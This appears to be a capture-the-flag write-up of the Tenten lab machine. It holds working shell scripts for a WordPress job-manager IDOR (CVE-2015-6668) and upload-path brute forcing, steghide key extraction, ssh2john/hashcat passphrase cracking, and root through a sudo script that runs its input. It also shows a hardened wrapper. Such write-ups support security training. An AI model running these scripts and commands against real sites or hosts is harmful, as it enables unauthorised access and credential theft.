nmap -p- --min-rate 10000 10.10.10.10 -Pn 


With the open ports identified, run a more detailed nmap scan against just those ports (service/version detection and default scripts):

nmap -A -sC -sV -p22,80 10.10.10.10 -Pn 


The nmap output references the hostname tenten.htb, so I add that name to /etc/hosts, pointing at 10.10.10.10, so it resolves locally.

Browsing the web application shows that it is a WordPress site.


Run wpscan to enumerate the WordPress installation (plugins, users) and look for known vulnerabilities:

wpscan --url http://tenten.htb/


wpscan reports the job-manager plugin, which is affected by CVE-2015-6668, an Insecure Direct Object Reference (IDOR): job applications, and the files uploaded with them, can be reached without authentication because application IDs are sequential and uploads land under predictable wp-content/uploads paths.

The IDOR can be confirmed with curl by iterating over application IDs and pulling the title of each application page:

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://tenten.htb/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

Application 13, titled HackerAccessGranted, stands out. Running the public exploit script for CVE-2015-6668 against it brute-forces the upload path and reveals the URL of the file attached to that application.

Opening that URL in a browser displays a JPEG image.
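The enumeration loop above and the upload-path brute force that the exploit script performs can both be expressed as a few shell functions. This is an added example, not the writeup's loop or the public exploit script: BASE, the year range, the month iteration and the extension list are assumptions, chosen so that the one path known from this target (wp-content/uploads/2017/04/HackerAccessGranted.jpg) is among the candidates.

```shell
#!/bin/sh
# Added example: enumerate job applications through the job-manager IDOR
# (CVE-2015-6668) and brute-force the predictable upload path of an attachment.
# Not the original exploit script; BASE, the year range and EXTS are assumptions.

BASE="${BASE:-http://tenten.htb}"
START_YEAR="${START_YEAR:-2016}"
END_YEAR="${END_YEAR:-2017}"
EXTS="${EXTS:-jpg png pdf doc docx}"

# Pull the text of the first element carrying class="entry-title" from HTML on stdin.
entry_title() {
  sed -n 's/.*class="entry-title"[^>]*>\([^<]*\)<.*/\1/p' | head -n 1
}

# Print "id: title" for every application id in [first, last].
# The pages are served unauthenticated; that is the IDOR.
enumerate_applications() {
  first="$1"; last="$2"
  i="$first"
  while [ "$i" -le "$last" ]; do
    title=$(curl -s "$BASE/index.php/jobs/apply/$i/" | entry_title)
    printf '%s: %s\n' "$i" "$title"
    i=$((i + 1))
  done
}

# WordPress stores uploads under wp-content/uploads/YYYY/MM/ and the plugin keeps
# the uploaded filename (on this target it matched the application title), so the
# path of an attachment for a known title is predictable.
candidate_urls() {
  stem="$1"
  y="$START_YEAR"
  while [ "$y" -le "$END_YEAR" ]; do
    m=1
    while [ "$m" -le 12 ]; do
      mm=$(printf '%02d' "$m")
      for ext in $EXTS; do
        printf '%s/wp-content/uploads/%s/%s/%s.%s\n' "$BASE" "$y" "$mm" "$stem" "$ext"
      done
      m=$((m + 1))
    done
    y=$((y + 1))
  done
}

# Request each candidate and report the ones that exist (HTTP 200).
find_upload() {
  candidate_urls "$1" | while read -r url; do
    code=$(curl -s -o /dev/null -w '%{http_code}' "$url")
    if [ "$code" = "200" ]; then
      printf 'FOUND %s\n' "$url"
    fi
  done
}

# Usage:  sh idor.sh enum 1 25                 (list application titles)
#         sh idor.sh find HackerAccessGranted  (locate the uploaded file)
case "${1:-}" in
  enum) enumerate_applications "$2" "$3" ;;
  find) find_upload "$2" ;;
esac
```

Widening START_YEAR/END_YEAR or EXTS trades requests for coverage; with the defaults each title costs 120 requests, which is cheap enough to run against a single WordPress host.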

Download it with wget:

wget http://tenten.htb/wp-content/uploads/2017/04/HackerAccessGranted.jpg

An image exposed this way is a likely carrier for hidden data, so I run steghide to extract anything embedded in it:

steghide extract -sf HackerAccessGranted.jpg


It extracts an encrypted SSH private key, id_rsa. Convert it into a crackable hash with ssh2john so the passphrase can be brute-forced:

ssh2john id_rsa > hash.txt


Note: ssh2john prefixes each hash with the key's filename (id_rsa:); strip that prefix from the start of hash.txt before handing the file to hashcat, or it will not parse the hash.

Crack it with hashcat. Mode 22931 covers the $sshng$1/$sshng$3 format that ssh2john produced for this key, and the wordlist is given as a positional argument (hashcat has no --wordlist option; that is a John the Ripper flag):

hashcat -m 22931 hash.txt /usr/share/wordlists/rockyou.txt
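The conversion step, including the filename-prefix caveat and the choice of hashcat mode, as an added helper that is not part of the writeup. The sample hash line in the test is constructed, its field values are placeholders, and the default wordlist path is an assumption.

```shell
#!/bin/sh
# Added example: turn ssh2john output into a hashcat-ready hash file.
# ssh2john prints "<filename>:<hash>"; hashcat wants only the "$sshng$..." part.

# Strip the leading "filename:" from every line and keep only $sshng$ hashes.
ssh2john_to_hashcat() {
  sed -n 's/^[^$]*:\(\$sshng\$.*\)$/\1/p'
}

# Choose the hashcat mode from the $sshng$<format>$ tag, following hashcat's
# mode list: 22911 ($0$), 22921 ($6$), 22931 ($1$ and $3$), 22941 ($4$), 22951 ($5$).
hashcat_mode() {
  case "$1" in
    '$sshng$0$'*) echo 22911 ;;
    '$sshng$6$'*) echo 22921 ;;
    '$sshng$1$'*|'$sshng$3$'*) echo 22931 ;;
    '$sshng$4$'*) echo 22941 ;;
    '$sshng$5$'*) echo 22951 ;;
    *) return 1 ;;
  esac
}

# Whole pipeline: ssh2john -> strip prefix -> hashcat with the matching mode.
# Usage: crack_key id_rsa [wordlist]
crack_key() {
  key="$1"; wordlist="${2:-/usr/share/wordlists/rockyou.txt}"
  ssh2john "$key" | ssh2john_to_hashcat > hash.txt
  mode=$(hashcat_mode "$(head -n 1 hash.txt)") || {
    echo "unsupported or empty hash in hash.txt" >&2
    return 1
  }
  hashcat -m "$mode" hash.txt "$wordlist"
}
```

Picking the mode from the tag avoids the usual "separator unmatched" / "token length exception" errors that come from feeding a $sshng$ hash of one format to the mode for another.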

wpscan had already enumerated the user takis, so I try the recovered passphrase as that user's SSH key passphrase:

takis: superpassword

Set the key file's permissions to 600 (ssh refuses to use a private key that other users can read), then log in to the machine with it.

user.txt


Running sudo -l to check this user's privileges shows an interesting entry: a binary called fuckin.

file reports that it is a Bash script.

Reading the script shows that it takes whatever it is given as input and executes it; because it is invoked through sudo, anything passed to it runs as root.
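The escalation here rests on a sudo rule that points at a script executing its own arguments. As an added illustration (not the contents of the script on the box, which the writeup only describes), here is that pattern next to a hardened wrapper that only runs exactly-matching absolute paths from an allow-list and passes the remaining arguments through unmodified; the ALLOWED entries are assumptions for the demo.

```shell
#!/bin/sh
# Added example: a "run what you are given" sudo wrapper next to a safer version.
# The vulnerable function mirrors the behaviour the writeup describes, not the
# exact file on the target; ALLOWED is an assumption for the demo.

# Vulnerable pattern: positional parameters are expanded unquoted and executed.
# With a sudo rule on this script, "sudo wrapper /bin/bash" is a root shell.
vulnerable_wrapper() {
  $1 $2 $3 $4
}

# Binaries the wrapper may launch, as absolute paths.
ALLOWED="/usr/bin/id /usr/bin/systemctl"

# Accept only an exact match against ALLOWED. Relative names are refused up
# front so PATH cannot be abused, and anything with extra characters
# ("/usr/bin/id;sh", "/usr/bin/id/../bash") simply fails the exact comparison.
is_allowed() {
  cmd="$1"
  case "$cmd" in
    /*) ;;
    *) return 1 ;;
  esac
  for a in $ALLOWED; do
    if [ "$cmd" = "$a" ]; then
      return 0
    fi
  done
  return 1
}

# Hardened wrapper: validate the binary, then run the exact argv with "$@",
# so the caller's input undergoes no word splitting or globbing.
guarded_wrapper() {
  if ! is_allowed "$1"; then
    printf 'refused: %s\n' "$1" >&2
    return 1
  fi
  "$@"
}
```

Even the hardened form is only as safe as the allow-listed binaries: a program that can spawn a shell or write arbitrary files (systemctl's pager, editors, interpreters) still hands over root, so the list has to be reviewed per binary, not just per path.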

root.txt
